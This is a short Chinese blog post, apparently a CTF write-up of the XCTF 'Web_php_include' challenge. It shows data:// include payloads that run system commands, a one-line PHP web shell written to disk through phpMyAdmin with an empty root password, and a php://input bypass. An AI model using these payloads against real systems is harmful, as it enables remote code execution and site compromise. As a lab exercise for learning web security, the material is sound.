Loading

攻防世界-Web_php_include

打开网页

这个网页会显示变量hello的值,,并且执行变量page中的内容,并且还会替换掉page变量中的php://

方法一

因为php://被过滤了,所以要用其他的伪协议,比如data://

所以构造payload

?page=data://text/plain,<?system('ls -l')?>

得到了flag文件的名称

于是构造payload得到flag内容

?page=data://text/plain,<?system('cat fl4gisisish3r3.php')?>

查看源码得到flag

方法二

通过御剑扫描后台得到

该网站存在phpmyadmin,使用root,密码为空进入后台

输入一句话木马

select "<?php eval(@$_POST['flag']); ?>" into outfile '/tmp/test.php'

用蚁剑连接

即可得到flag

方法三

可以用Php://input绕过过滤,然后在包内添加php命令得到flag

posted @ 2021-10-10 14:50  Nanne1ess  阅读(52)  评论(0)    收藏  举报